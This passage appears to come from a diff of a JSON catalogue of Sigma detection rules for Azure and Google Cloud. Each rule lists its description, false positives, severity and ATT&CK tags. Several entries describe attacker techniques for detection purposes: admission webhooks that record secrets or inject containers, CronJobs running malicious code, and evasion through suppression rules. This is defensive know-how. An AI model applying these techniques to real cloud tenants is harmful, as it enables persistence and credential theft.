Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Network Security Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_network_security_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_security_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "d22b4df4-5a67-4859-a578-8c9a0b5af9df", - "value": "Azure Network Security Configuration Modified or Deleted" - }, - { - "description": "Identifies when a virtual network device is being modified or deleted.\nThis can be a network interface, network virtual appliance, virtual hub, or virtual router.\n", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/08", - "falsepositive": [ - "Virtual Network Device being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Virtual Network Device modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "azure_network_virtual_device_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_virtual_device_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "15ef3fac-f0f0-4dc4-ada0-660aa72980b3", - "value": "Azure Virtual Network Device Modified or Deleted" - }, - { - "description": "Identifies when a new cloudshell is created inside of Azure portal.", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/09/21", - "falsepositive": [ - "A new cloudshell may be created by a system administrator." - ], - "filename": "azure_new_cloudshell_created.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_new_cloudshell_created.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "72af37e2-ec32-47dc-992b-bc288a2708cb", - "value": "Azure New CloudShell Created" - }, - { - "description": "Identifies when a owner is was removed from a application or service principal in Azure.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/03", - "falsepositive": [ - "Owner being removed may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Owner removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "azure_owner_removed_from_application_or_service_principal.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_owner_removed_from_application_or_service_principal.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "636e30d5-3736-42ea-96b1-e6e2f8429fd6", - "value": "Azure Owner Removed From Application or Service Principal" - }, - { - "description": "Detects when a PIM elevation is approved or denied. Outside of normal operations should be investigated.", - "meta": { - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", - "creation_date": "2022/08/09", - "falsepositive": [ - "Actual admin using PIM." - ], - "filename": "azure_pim_activation_approve_deny.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_activation_approve_deny.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1078" - ] - }, - "uuid": "039a7469-0296-4450-84c0-f6966b16dc6d", - "value": "PIM Approvals And Deny Elevation" - }, - { - "description": "Detects when PIM alerts are set to disabled.", - "meta": { - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", - "creation_date": "2022/08/09", - "falsepositive": [ - "Administrator disabling PIM alerts as an active choice." 
- ], - "filename": "azure_pim_alerts_disabled.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_alerts_disabled.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1484" - ] - }, - "uuid": "aeaef14c-e5bf-4690-a9c8-835caad458bd", - "value": "PIM Alert Setting Changes To Disabled" - }, - { - "description": "Detects when changes are made to PIM roles", - "meta": { - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", - "creation_date": "2022/08/09", - "falsepositive": [ - "Legit administrative PIM setting configuration changes" - ], - "filename": "azure_pim_change_settings.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_pim_change_settings.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1078" - ] - }, - "uuid": "db6c06c4-bf3b-421c-aa88-15672b88c743", - "value": "Changes To PIM Settings" - }, - { - "description": "Detects when a user is added to a privileged role.", - "meta": { - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", - "creation_date": "2022/08/06", - "falsepositive": [ - "Legtimate administrator actions of adding members from a role" - ], - "filename": "azure_priviledged_role_assignment_add.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - 
"https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_priviledged_role_assignment_add.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ] - }, - "uuid": "49a268a4-72f4-4e38-8a7b-885be690c5b5", - "value": "User Added To Privilege Role" - }, - { - "description": "Detects when a user is removed from a privileged role. Bulk changes should be investigated.", - "meta": { - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", - "creation_date": "2022/08/05", - "falsepositive": [ - "Legtimate administrator actions of removing members from a role" - ], - "filename": "azure_priviledged_role_assignment_bulk_change.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-identity-management#azure-ad-roles-assignment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_priviledged_role_assignment_bulk_change.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ] - }, - "uuid": "102e11e3-2db5-4c9e-bc26-357d42585d21", - "value": "Bulk Deletion Changes To Privileged Account Permissions" - }, - { - "description": "Detects when a new admin is created.", - "meta": { - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H', Tim Shelton", - "creation_date": "2022/08/11", - "falsepositive": [ - "A legitimate new admin account being created" - ], - "filename": "azure_privileged_account_creation.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_privileged_account_creation.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1078" - ] - }, - "uuid": "f7b5b004-dece-46e4-a4a5-f6fd0e1c6947", - "value": "Privileged Account Creation" - }, - { - "description": "Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.", - "meta": { - "author": "sawwinnnaung", - "creation_date": "2020/05/07", - "falsepositive": [ - "Valid change" - ], - "filename": "azure_rare_operations.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/RareOperations.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_rare_operations.yml" - ], - "tags": [ - "attack.t1003" - ] - }, - "uuid": "c1182e02-49a3-481c-b3de-0fadc4091488", - "value": "Rare Subscription-level Operations In Azure" - }, - { - "description": "Identifies when a service principal is created in Azure.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/02", - "falsepositive": [ - "Service principal being created may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Service principal created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "azure_service_principal_created.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_service_principal_created.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "0ddcff6d-d262-40b0-804b-80eb592de8e3", - "value": "Azure Service Principal Created" - }, - { - "description": "Identifies when a service principal was removed in Azure.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/09/03", - "falsepositive": [ - "Service principal being removed may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Service principal removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "azure_service_principal_removed.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_service_principal_removed.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "448fd1ea-2116-4c62-9cde-a92d120e0f08", - "value": "Azure Service Principal Removed" - }, - { - "description": "Detects when a user has been elevated to manage all Azure Subscriptions.\nThis change should be investigated immediately if it isn't planned.\nThis setting could allow an attacker access to Azure subscriptions in your environment.\n", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/11/26", - "falsepositive": [ - "If this was approved by System Administrator." - ], - "filename": "azure_subscription_permissions_elevation_via_activitylogs.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftauthorization", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_subscription_permissions_elevation_via_activitylogs.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ] - }, - "uuid": "09438caa-07b1-4870-8405-1dbafe3dad95", - "value": "Azure Subscription Permission Elevation Via ActivityLogs" - }, - { - "description": "Detects when a user has been elevated to manage all Azure Subscriptions.\nThis change should be investigated immediately if it isn't planned.\nThis setting could allow an attacker access to Azure subscriptions in your environment.\n", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/11/26", - "falsepositive": [ - "If this was 
approved by System Administrator." - ], - "filename": "azure_subscription_permissions_elevation_via_auditlogs.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#assignment-and-elevation", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_subscription_permissions_elevation_via_auditlogs.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ] - }, - "uuid": "ca9bf243-465e-494a-9e54-bf9fc239057d", - "value": "Azure Subscription Permission Elevation Via AuditLogs" - }, - { - "description": "Identifies when a suppression rule is created in Azure. Adversary's could attempt this to evade detection.", - "meta": { - "author": "Austin Songer", - "creation_date": "2021/08/16", - "falsepositive": [ - "Suppression Rule being created may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Suppression Rule created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_suppression_rule_created.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_suppression_rule_created.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "92cc3e5d-eb57-419d-8c16-5c63f325a401", - "value": "Azure Suppression Rule Created" - }, - { - "description": "Detects when a temporary access pass (TAP) is added to an account. 
TAPs added to priv accounts should be investigated", - "meta": { - "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", - "creation_date": "2022/08/10", - "falsepositive": [ - "Administrator adding a legitmate temporary access pass" - ], - "filename": "azure_tap_added.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#changes-to-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_tap_added.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1078" - ] - }, - "uuid": "fa84aaf5-8142-43cd-9ec2-78cfebf878ce", - "value": "Temporary Access Pass Added To An Account" - }, - { - "description": "Detects when there is a interruption in the authentication process.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/11/26", - "falsepositive": [ - "Unknown" - ], - "filename": "azure_unusual_authentication_interruption.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_unusual_authentication_interruption.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ] - }, - "uuid": "8366030e-7216-476b-9927-271d79f13cf3", - "value": "Azure Unusual Authentication Interruption" - }, - { - "description": "Detect when users in your Azure AD tenant are authenticating to other Azure AD Tenants.", - "meta": { - "author": "MikeDuddington, '@dudders1'", - "creation_date": "2022/06/30", - "falsepositive": [ - "If this was approved by System Administrator." 
- ], - "filename": "azure_users_authenticating_to_other_azure_ad_tenants.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_users_authenticating_to_other_azure_ad_tenants.yml" - ], - "tags": [ - "attack.t1078" - ] - }, - "uuid": "5f521e4b-0105-4b72-845b-2198a54487b9", - "value": "Users Authenticating To Other Azure AD Tenants" - }, - { - "description": "Detect access has been blocked by Conditional Access policies.\nThe access policy does not allow token issuance which might be sights≈ of unauthorizeed login to valid accounts.\n", - "meta": { - "author": "AlertIQ", - "creation_date": "2021/10/10", - "falsepositive": [ - "Unknown" - ], - "filename": "azure_user_login_blocked_by_conditional_access.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_user_login_blocked_by_conditional_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110" - ] - }, - "uuid": "9a60e676-26ac-44c3-814b-0c2a8b977adf", - "value": "User Access Blocked by Azure Conditional Access" - }, - { - "description": "Detect when a user has reset their password in Azure AD", - "meta": { - "author": "YochanaHenderson, '@Yochana-H'", - "creation_date": "2022/08/03", - "falsepositive": [ - "If this was approved by System Administrator or confirmed user action." 
- ], - "filename": "azure_user_password_change.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_user_password_change.yml" - ], - "tags": [ - "attack.t1078" - ] - }, - "uuid": "340ee172-4b67-4fb4-832f-f961bdc1f3aa", - "value": "Password Reset By User Account" - }, - { - "description": "Identifies when a Virtual Network is modified or deleted in Azure.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/08", - "falsepositive": [ - "Virtual Network being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Virtual Network modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_virtual_network_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_virtual_network_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "bcfcc962-0e4a-4fd9-84bb-a833e672df3f", - "value": "Azure Virtual Network Modified or Deleted" - }, - { - "description": "Identifies when a VPN connection is modified or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/08", - "falsepositive": [ - "VPN Connection being modified or deleted may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "VPN Connection modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "azure_vpn_connection_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "azure", - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_vpn_connection_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "61171ffc-d79c-4ae5-8e10-9323dba19cd3", - "value": "Azure VPN Connection Modified or Deleted" - }, - { - "description": "Detects when storage bucket is enumerated in Google Cloud.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/14", - "falsepositive": [ - "Storage Buckets being enumerated may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Storage Buckets enumerated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "gcp_bucket_enumeration.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "gcp", - "refs": [ - "https://cloud.google.com/storage/docs/json_api/v1/buckets", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_bucket_enumeration.yml" - ], - "tags": [ - "attack.discovery" - ] - }, - "uuid": "e2feb918-4e77-4608-9697-990a1aaf74c3", - "value": "Google Cloud Storage Buckets Enumeration" - }, - { - "description": "Detects when storage bucket is modified or deleted in Google Cloud.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/14", - "falsepositive": [ - "Storage Buckets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Storage Buckets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "gcp_bucket_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "gcp", - "refs": [ - "https://cloud.google.com/storage/docs/json_api/v1/buckets", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "4d9f2ee2-c903-48ab-b9c1-8c0f474913d0", - "value": "Google Cloud Storage Buckets Modified or Deleted" - }, - { - "description": "Identifies when sensitive information is re-identified in google Cloud.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/15", - "falsepositive": [ - "Unknown" - ], - "filename": "gcp_dlp_re_identifies_sensitive_information.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "gcp", - "refs": [ - "https://cloud.google.com/dlp/docs/reference/rest/v2/projects.content/reidentify", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_dlp_re_identifies_sensitive_information.yml" - ], - "tags": [ - "attack.impact", - "attack.t1565" - ] - }, - "uuid": "234f9f48-904b-4736-a34c-55d23919e4b7", - "value": "Google Cloud Re-identifies Sensitive Information" - }, - { - "description": "Identifies when a DNS Zone is modified or deleted in Google Cloud.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/15", - "falsepositive": [ - "Unknown" - ], - "filename": "gcp_dns_zone_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "gcp", - "refs": [ - "https://cloud.google.com/dns/docs/reference/v1/managedZones", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "28268a8f-191f-4c17-85b2-f5aa4fa829c3", - "value": "Google Cloud DNS Zone Modified or Deleted" - }, - { - "description": 
"Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/13", - "falsepositive": [ - "Firewall rules being modified or deleted may be performed by a system administrator. Verify that the firewall configuration change was expected.", - "Exceptions can be added to this rule to filter expected behavior." - ], - "filename": "gcp_firewall_rule_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "gcp", - "refs": [ - "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", - "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ] - }, - "uuid": "fe513c69-734c-4d4a-8548-ac5f609be82b", - "value": "Google Cloud Firewall Modified or Deleted" - }, - { - "description": "Identifies potential full network packet capture in gcp. This feature can potentially be abused to read sensitive data from unencrypted internal traffic.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/13", - "falsepositive": [ - "Full Network Packet Capture may be done by a system or network administrator.", - "If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "gcp_full_network_traffic_packet_capture.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "gcp", - "refs": [ - "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", - "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml" - ], - "tags": [ - "attack.collection", - "attack.t1074" - ] - }, - "uuid": "980a7598-1e7f-4962-9372-2d754c930d0e", - "value": "Google Full Network Traffic Packet Capture" - }, - { - "description": "Identifies when an admission controller is executed in GCP Kubernetes.\nA Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\nThe behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\nAn adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\nFor example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\nAn adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.\n", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/11/25", - "falsepositive": [ - "Google Cloud Kubernetes Admission Controller may be done by a system administrator.", - "If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "gcp_kubernetes_admission_controller.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "gcp", - "refs": [ - "https://cloud.google.com/kubernetes-engine/docs", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_admission_controller.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1078", - "attack.credential_access", - "attack.t1552", - "attack.t1552.007" - ] - }, - "uuid": "6ad91e31-53df-4826-bd27-0166171c8040", - "value": "Google Cloud Kubernetes Admission Controller" - }, - { - "description": "Identifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\nKubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.\nAn Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\n", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/11/22", - "falsepositive": [ - "Google Cloud Kubernetes CronJob/Job may be done by a system administrator.", - "If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "gcp_kubernetes_cronjob.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "gcp", - "refs": [ - "https://cloud.google.com/kubernetes-engine/docs", - "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", - "https://kubernetes.io/docs/concepts/workloads/controllers/job/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_cronjob.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.execution" - ] - }, - "uuid": "cd3a808c-c7b7-4c50-a2f3-f4cfcd436435", - "value": "Google Cloud Kubernetes CronJob" - }, - { - "description": "Detects the creation or patching of potential malicious RoleBinding. This includes RoleBindings and ClusterRoleBinding.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/09", - "falsepositive": [ - "RoleBindings and ClusterRoleBinding being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "RoleBindings and ClusterRoleBinding modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "gcp_kubernetes_rolebinding.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "gcp", - "refs": [ - "https://github.com/elastic/detection-rules/pull/1267", - "https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole", - "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control", - "https://kubernetes.io/docs/reference/access-authn-authz/rbac/", - "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_rolebinding.yml" - ], - "tags": [ - "attack.credential_access" - ] - }, - "uuid": "0322d9f2-289a-47c2-b5e1-b63c90901a3e", - "value": "Google Cloud Kubernetes RoleBinding" - }, - { - "description": "Identifies when the Secrets are Modified or Deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/09", - "falsepositive": [ - "Secrets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "filename": "gcp_kubernetes_secrets_modified_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "gcp", - "refs": [ - "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_secrets_modified_or_deleted.yml" - ], - "tags": [ - "attack.credential_access" - ] - }, - "uuid": "2f0bae2d-bf20-4465-be86-1311addebaa3", - "value": "Google Cloud Kubernetes Secrets Modified or Deleted" - }, - { - "description": "Identifies when a service account is disabled or deleted in Google Cloud.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/14", - "falsepositive": [ - "Service Account being disabled or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Service Account disabled or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "gcp_service_account_disabled_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "gcp", - "refs": [ - "https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.t1531" - ] - }, - "uuid": "13f81a90-a69c-4fab-8f07-b5bb55416a9f", - "value": "Google Cloud Service Account Disabled or Deleted" - }, - { - "description": "Identifies when a service account is modified in Google Cloud.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/14", - "falsepositive": [ - "Service Account being modified may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Service Account modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "filename": "gcp_service_account_modified.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "gcp", - "refs": [ - "https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_service_account_modified.yml" - ], - "tags": [ - "attack.impact" - ] - }, - "uuid": "6b67c12e-5e40-47c6-b3b0-1e6b571184cc", - "value": "Google Cloud Service Account Modified" - }, - { - "description": "Detect when a Cloud SQL DB has been modified or deleted.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/10/15", - "falsepositive": [ - "SQL Database being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "SQL Database 